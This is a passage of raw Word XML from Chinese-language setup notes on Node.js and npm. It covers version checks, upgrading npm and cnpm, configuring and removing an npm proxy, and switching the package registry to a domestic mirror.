    </w:p>
    <w:p w14:paraId="55AA7A87" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="082B5E7E" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02D4CC43" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38ACDA91" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A49B74E" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="590A18E1" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73695F01" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C6E9F74" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRPr="00C05D72" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AE7E2CF" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CF4E57C" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A14880E" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00B48244" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27F623E0" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28CB128F" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1193B030" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69DACE0E" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A1FE284" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0441A1A5" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRPr="00C05D72" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64E2F98D" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="728C826B" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="137427CD" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A27B0B9" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FB38D77" w14:textId="77777777" w:rsidR="00917C6F" w:rsidRDefault="00917C6F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DEDD9F9" w14:textId="77777777" w:rsidR="00B83635" w:rsidRPr="00DC1DED" w:rsidRDefault="00B83635" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34CAE4E7" w14:textId="1FF10680" w:rsidR="00DC1DED" w:rsidRDefault="00317161" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="663" w:name="_Toc159780093"/>
      <w:r>
        <w:t>NodeJS</w:t>
      </w:r>
      <w:r w:rsidR="005078A0">
        <w:t>，VUE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="663"/>
    </w:p>
    <w:p w14:paraId="7D04FFCB" w14:textId="77777777" w:rsidR="00030822" w:rsidRPr="00030822" w:rsidRDefault="00030822" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D62DC90" w14:textId="77777777" w:rsidR="00317161" w:rsidRDefault="00317161" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="239CC32F" w14:textId="524351E2" w:rsidR="00317161" w:rsidRDefault="00317161" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00317161">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>node.js</w:t>
      </w:r>
      <w:r w:rsidRPr="00317161">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官网下载并安装</w:t>
      </w:r>
      <w:r w:rsidRPr="00317161">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>node</w:t>
      </w:r>
      <w:r w:rsidR="00E936C8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7690E8" w14:textId="400ED427" w:rsidR="00317161" w:rsidRDefault="00317161" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>node</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7295DB" w14:textId="056A825F" w:rsidR="00317161" w:rsidRPr="00317161" w:rsidRDefault="00B16AD9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00B16AD9">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>v16.13.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BC4576" w14:textId="1D2162F1" w:rsidR="00DC1DED" w:rsidRDefault="00317161" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是包管理器，集成在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>node</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，安装了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>node</w:t>
      </w:r>
      <w:r w:rsidR="00B16AD9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就肯定也安装了</w:t>
      </w:r>
      <w:r w:rsidR="00B16AD9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:r w:rsidR="00B16AD9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FD5392" w14:textId="3022B577" w:rsidR="00B16AD9" w:rsidRDefault="00B16AD9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">pm -v </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC1AE03" w14:textId="36A46AD6" w:rsidR="00DC1DED" w:rsidRDefault="00B16AD9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00B16AD9">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>8.1.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243D8361" w14:textId="77777777" w:rsidR="00DC1DED" w:rsidRDefault="00DC1DED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="612E1B79" w14:textId="77777777" w:rsidR="002D5EE0" w:rsidRDefault="002D5EE0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B83EE95" w14:textId="77777777" w:rsidR="002D5EE0" w:rsidRDefault="002D5EE0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F64A83C" w14:textId="77777777" w:rsidR="002D5EE0" w:rsidRDefault="002D5EE0" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="664" w:name="_Toc159780094"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>升级</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cnpm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="664"/>
    </w:p>
    <w:p w14:paraId="0B2701E8" w14:textId="77777777" w:rsidR="002D5EE0" w:rsidRDefault="002D5EE0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A9EB2BB" w14:textId="77777777" w:rsidR="00BE4B98" w:rsidRDefault="00BE4B98" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353BA725" w14:textId="77777777" w:rsidR="00BE4B98" w:rsidRDefault="00BE4B98" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>$ npm -v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C880FFB" w14:textId="77777777" w:rsidR="00BE4B98" w:rsidRDefault="00BE4B98" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>2.3.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD9EC59" w14:textId="77777777" w:rsidR="00BE4B98" w:rsidRDefault="00BE4B98" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="354CD5D8" w14:textId="77777777" w:rsidR="00BE4B98" w:rsidRDefault="00BE4B98" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>升级</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> npm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB48C32" w14:textId="77777777" w:rsidR="00BE4B98" w:rsidRDefault="00BE4B98" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>cnpm install npm -g</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C733401" w14:textId="77777777" w:rsidR="00BE4B98" w:rsidRDefault="00BE4B98" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A9EDC09" w14:textId="77777777" w:rsidR="00BE4B98" w:rsidRDefault="00BE4B98" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B6C1EA9" w14:textId="77777777" w:rsidR="00BE4B98" w:rsidRDefault="00BE4B98" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>升级或安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> cnpm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5215F7AB" w14:textId="1DE1079F" w:rsidR="002D5EE0" w:rsidRPr="00BE4B98" w:rsidRDefault="00BE4B98" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>npm install cnpm -g</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210F1ACD" w14:textId="77777777" w:rsidR="002D5EE0" w:rsidRDefault="002D5EE0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="198B549D" w14:textId="7BECEFA8" w:rsidR="0017155E" w:rsidRDefault="0017155E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="665" w:name="_Toc159780095"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置代理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="665"/>
    </w:p>
    <w:p w14:paraId="29D1BD4C" w14:textId="77777777" w:rsidR="00C03299" w:rsidRDefault="00C03299" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68D49434" w14:textId="14050CC3" w:rsidR="0017155E" w:rsidRDefault="0017155E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="666" w:name="_Toc159780096"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置代理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="666"/>
    </w:p>
    <w:p w14:paraId="3E4680EF" w14:textId="4AE82AE3" w:rsidR="0017155E" w:rsidRDefault="0017155E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>npm config set proxy=http://127.0.0.1:6666</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1A5B56" w14:textId="4F57CB63" w:rsidR="00B16EEE" w:rsidRDefault="0017155E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>npm config set registry=http://registry.npmjs.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F642B93" w14:textId="77777777" w:rsidR="00B16EEE" w:rsidRDefault="00B16EEE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22214516" w14:textId="54DC4DD6" w:rsidR="00B16EEE" w:rsidRDefault="00B16EEE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果代理有用户名密码认证，则写的格式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572EE0E9" w14:textId="77777777" w:rsidR="00B16EEE" w:rsidRDefault="00B16EEE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>npm config set proxy http://username:password@server:port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C772F59" w14:textId="77777777" w:rsidR="00B16EEE" w:rsidRDefault="00B16EEE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>npm confit set https-proxy http://username:password@server:port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513B7E1E" w14:textId="77777777" w:rsidR="00B16EEE" w:rsidRPr="00B16EEE" w:rsidRDefault="00B16EEE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CB1A2C2" w14:textId="77777777" w:rsidR="00B16EEE" w:rsidRDefault="00B16EEE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25C2C88E" w14:textId="7BF59EB1" w:rsidR="0017155E" w:rsidRPr="00B16EEE" w:rsidRDefault="0017155E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="667" w:name="_Toc159780097"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:bookmarkEnd w:id="667"/>
    </w:p>
    <w:p w14:paraId="2E20A466" w14:textId="07ACAFBF" w:rsidR="0017155E" w:rsidRDefault="0017155E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>经过上面设置使用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开头的源，因此不需要设</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https_proxy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了，否则还要增加一句</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354FA7E9" w14:textId="10EA979B" w:rsidR="0017155E" w:rsidRDefault="0017155E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">npm config set https-proxy </w:t>
      </w:r>
      <w:r w:rsidR="00B16EEE">
        <w:t>http://127.0.0.1:6666</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF8D5B7" w14:textId="6454F0A0" w:rsidR="0017155E" w:rsidRDefault="0017155E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E2BC092" w14:textId="77777777" w:rsidR="0017155E" w:rsidRDefault="0017155E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="668" w:name="_Toc159780098"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>取消代理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="668"/>
    </w:p>
    <w:p w14:paraId="7F877AE0" w14:textId="77777777" w:rsidR="0017155E" w:rsidRDefault="0017155E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>npm config delete proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5B9455" w14:textId="188C93CA" w:rsidR="0017155E" w:rsidRDefault="0017155E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>npm config delete https-proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4149CFEB" w14:textId="77777777" w:rsidR="0017155E" w:rsidRPr="0017155E" w:rsidRDefault="0017155E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="735F0A71" w14:textId="7212915E" w:rsidR="0017155E" w:rsidRDefault="00BA0D55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A834BB8" w14:textId="77777777" w:rsidR="00BA0D55" w:rsidRDefault="00BA0D55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06C95911" w14:textId="77777777" w:rsidR="00BA0D55" w:rsidRDefault="00BA0D55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">npm config rm proxy   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D06B5A3" w14:textId="756A8C42" w:rsidR="0017155E" w:rsidRDefault="00BA0D55" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>npm config rm https-proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A48E4E" w14:textId="77777777" w:rsidR="0017155E" w:rsidRDefault="0017155E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E2341F9" w14:textId="15D30BD1" w:rsidR="00C67EAA" w:rsidRDefault="00C67EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="669" w:name="_Toc159780099"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>pm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置国内源</w:t>
      </w:r>
      <w:bookmarkEnd w:id="669"/>
    </w:p>
    <w:p w14:paraId="2E6450E6" w14:textId="77777777" w:rsidR="00C67EAA" w:rsidRDefault="00C67EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看当前镜像</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE7EC6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE7EC6">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pm</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE7EC6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE7EC6">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>config get registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01650B9B" w14:textId="77777777" w:rsidR="00C67EAA" w:rsidRDefault="00C67EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId173" w:history="1">
        <w:r w:rsidRPr="003B1786">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://registry.npmmirror.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就是国内镜像，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F0FE9C" w14:textId="4C708206" w:rsidR="00893755" w:rsidRDefault="00893755" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId174" w:history="1">
        <w:r w:rsidRPr="003B1786">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>http://registry.npmjs.org/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是国际源，国内访问会太慢</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334507E9" w14:textId="77777777" w:rsidR="00C67EAA" w:rsidRDefault="00C67EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EFCB72C" w14:textId="400C1CC7" w:rsidR="00C67EAA" w:rsidRDefault="00C67EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>如果不是，则切换源</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6A2E43" w14:textId="77777777" w:rsidR="00C67EAA" w:rsidRPr="00FE7EC6" w:rsidRDefault="00C67EAA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
